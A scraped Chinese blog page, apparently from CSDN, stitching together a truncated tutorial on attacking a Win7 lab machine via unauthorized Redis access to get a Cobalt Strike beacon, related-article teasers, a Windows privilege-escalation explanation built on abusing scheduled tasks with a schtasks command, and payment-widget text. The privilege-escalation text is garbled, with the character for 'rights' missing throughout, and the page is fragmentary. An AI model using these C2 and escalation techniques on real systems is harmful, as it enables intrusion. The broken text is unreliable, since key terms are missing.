文章目录简介前期准备kali搭建cs服务器win10启动cs客户端探测靶机开放端口攻击步骤nmap探测是否存在redis未授连接靶机rediscs上线cs开启监听redis写入powershell靶机重启,cs上线 简介 cs服务器:192.168.43.113(kali) cs客户端兼攻击机:192.168.43.101(win10) 靶机:192.168.43.42(win7) 前期准备 kali搭建cs服务器 sudo ./teamserver 192.168.43.113 yuchi123 w
网络安全工具汇总(非常详细)零基础入门到精通,收藏这一篇就够了
Java癫疯的博客
05-14 2242
网络安全工具汇总(非常详细)零基础入门到精通,收藏这一篇就够了
MDUT 开源项目教程
gitblog_00700的博客
08-09 521
MDUT 开源项目教程 1. 项目介绍 MDUT(Multiple Database Utilization Tools) 是一款基于JavaFX开发的跨平台数据库管理工具,专注于简化多种主流数据库类型的交互。它继承自SQLTOOLS项目,供了友好的GUI界面,支持多数据库的同时操作,且各个数据库实例相互独立,极大地便利了网络安全从业者的工作。 2. 项目快速启动 环境准备 确保你的系统已安装 ...
mssql&oracle数据库
m0_62207170的博客
03-19 1335
mssql&oracle数据库
windows 数据库
最新发布
01-19
### Windows系统中的操作 在Windows操作系统中,升()是指通过某些方法获得更高的限级别以便执行特定的操作。通常情况下,只有`SYSTEM`成员才具有最高级别的控制限[^1]。 #### 计划任务 一种常见的方式涉及滥用计划任务功能。具体来说,如果存在配置错误的计划任务,则可能允许较低限的用户修改这些任务的内容并借此实现。例如: - `at`命令虽然已经被弃用,但在早期版本中,默认是以`System`限来启动指定的任务。 - 对于`schtasks`命令而言,当其设置不当——即某个计划任务能够以较高限被执行而该任务文件又可由低限用户编辑时,就可能存在安全风险[^2]。 ```powershell # 创建一个新的计划任务,假设此路径下的脚本可以被普通用户写入 schtasks /create /tn "MyTask" /tr "C:\path\to\script.bat" /sc ONCE /st 00:00 ``` 需要注意的是,在实际环境中实施此类技术可能会违反法律法规或公司政策,请仅用于合法授的安全测试目的。 --- 对于数据库层面的活动,这取决于所使用的DBMS类型及其内部机制。一般来讲,攻击者会尝试利用SQL注入漏洞或其他应用程序逻辑缺陷来获取管理员级访问限。然而,讨论具体的数据库技巧超出了当前上下文范围,并且涉及到更复杂的技术细节和道德考量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值